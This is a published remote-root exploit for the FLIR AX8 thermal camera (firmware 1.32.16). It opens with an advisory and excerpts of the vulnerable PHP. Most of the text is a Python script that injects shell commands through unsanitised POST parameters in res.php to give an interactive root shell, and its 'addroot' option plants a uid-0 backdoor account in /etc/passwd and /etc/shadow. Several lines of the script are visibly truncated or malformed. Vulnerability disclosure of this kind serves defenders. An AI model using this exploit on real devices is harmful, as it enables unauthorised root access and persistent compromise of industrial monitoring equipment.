FLIR Systems FLIR AX8 Thermal Camera 1.32.16 Remote Root

The FLIR AX8 thermal sensor camera version 1.32.16 suffers from two unauthenticated command injection vulnerabilities. The issues can be triggered when calling multiple unsanitized HTTP GET/POST parameters within the shell_exec function in res.php and palette.php file. This can be exploited to inject arbitrary system commands and gain root remote code execution.

MD5 | d06114bdae6c5e38a699adb6567a8ba2

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# FLIR Systems FLIR AX8 Thermal Camera 1.32.16 Remote Root Exploit
# Vendor: FLIR Systems, Inc.
# Product web page:
# Affected version: Firmware: 1.32.16
# 1.17.13
# OS: neco_v1.8-0-g7ffe5b3
# Hardware: Flir Systems Neco Board
# Summary: Thermal Imaging Camera For Continuous Condition and Safety
# Monitoring FLIR AX8 is a thermal sensor with imaging capabilities.
# Combining thermal and visual cameras in a small, affordable package,
# the AX8 provides continuous temperature monitoring and alarming capabilities
# to protec critical electrical and mechanical equipment. The AX8 helps
# you guard against unplanned outages, service interruptions, and equipment
# failure.
# The FLIR AX series camera/sensor also has built-in support to connect to
# industrial control equipment such as programmable logic controllers (PLCs),
# and allows the sharing of analysis and alarm results and simple control
# using the Ethernet/IP and Modbus TCP field bus protocols. Compact and easy
# to install, the AX8 provides continuous monitoring of electrical cabinets,
# process and manufacturing areas, data centers, energy generation and distribution,
# transportation and mass transit, storage facilities and refrigeration warehouses.
# Desc: The FLIR AX8 thermal sensor camera suffers from two unauthenticated
# command injection vulnerabilities. The issues can be triggered when calling
# multiple unsanitized HTTP GET/POST parameters within the shell_exec function
# in res.php and palette.php file. This can be exploited to inject arbitrary
# system commands and gain root remote code execution.
# =============================================================================
# /FLIR/usr/www/res.php:
# ----------------------
# 1. <?php
# 2. if (isset($_POST["action"])) {
# 3. switch ($_POST["action"]) {
# 4. case "get":
# 5. if(isset($_POST["resource"]))
# 6. {
# 7. switch ($_POST["resource"]) {
# 8. case ".rtp.hflip":
# 9. if (!file_exists("/FLIR/system/journal.d/horizontal_flip.cfg")) {
# 10. $result = "false";
# 11. break;
# 12. }
# 13. $result = file_get_contents("/FLIR/system/journal.d/horizontal_flip.cfg") === "1" ? "true" : "false";
# 14. break;
# 15. case ".rtp.vflip":
# 16. if (!file_exists("/FLIR/system/journal.d/vertical_flip.cfg")) {
# 17. $result = "false";
# 18. break;
# 19. }
# 20. $result = file_get_contents("/FLIR/system/journal.d/vertical_flip.cfg") === "1" ? "true" : "false";
# 21. break;
# 22. default:
# 23. $result = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls -o ".$_POST["resource"]));
# 24. }
# 25. }
# =============================================================================
# /FLIR/usr/www/palette.php:
# --------------------------
# 1. <?php
# 2. if(isset($_POST["palette"])){
# 3. shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/palette ".$_POST["palette"]);
# 4. echo json_encode(array("success"));
# 5. }
# 6. ?>
# =============================================================================
# Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l)
# lighttpd/1.4.33
# PHP/5.4.14
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
# Advisory ID: ZSL-2018-5491
# Advisory URL:
# 26.07.2018

import requests
import colorama
import random##
import time####
import json####
import sys#####
import os######

piton = os.path.basename(sys.argv[0])

if len(sys.argv) < 2:
print '\n\x20\x20[*] Usage: '+piton+' <ip:port>\n'

bannah = """
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print bannah

print '\nFLIR AX8 Thermal Camera Remote Root Exploit'
print 'By Zero Science Lab'

ICU = '''

colors = list(vars(colorama.Fore).values())
colored_chars = [random.choice(colors) + char for char in ICU]


print '\x1b[1;37;44m'+'To freeze the stream run: '+'\x1b[0m'+' /FLIR/usr/bin/freeze on'
print '\x1b[1;37;41m'+'To unfreeze the stream run: '+'\x1b[0m'+' /FLIR/usr/bin/freeze off\n'

print '[*] Additional commands:'
print ' [+] \'addroot\' for add root user.'
print ' [+] \'exit\' for exit.\n'

while True:

zeTargets = 'http://'+sys.argv[1]+'/res.php'
zeCommand = raw_input('\x1b[0;96;49m'+'root@neco-0J0X17:~# '+'\x1b[0m')
zeHeaders = {'Cache-Control' : 'max-age=0',
'User-Agent' : 'thricer/251.4ev4h',
'Accept' : 'text/html,application/xhtml+xml',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'mk-MK,mk;q=1.7',
'Connection' : 'close',
'Connection-Type' : 'application/x-www-form-urlencoded'}
zePardata = {'action' : 'get',
'resource' : ';'+zeCommand}


zeRequest =, headers=zeHeaders, data=zePardata)
print json.loads(zeRequest.text)

if zeCommand.strip() == 'exit':

if zeCommand.strip() == 'addroot':
print '[+] Blind command injection using palette.php...'
print '[+] Adding user \'roOt\' with password \'rewt\' in shadow file...'

nuTargets = 'http://'+sys.argv[1]+'/palette.php'
nuHeaders = zeHeaders

nuHexstrn = ('\\x72\\x6f\\x4f\\x74\\x3a\\x24\\x31'

nuPadata1 = {'palette' : '1;echo \"roOt:x:0:0:pwn:/sys:/bin/bash\" >> /etc/passwd'}
nuPadata2 = {'palette' : '1;echo -n -e \"'+nuHexstrn+'\" >> /etc/shadow'}, headers=nuHeaders, data=nuPadata1)
time.sleep(2), headers=nuHeaders, data=nuPadata2)

print '[*] Success!\n'
else: pass

except Exception:
print '[*] Error!'


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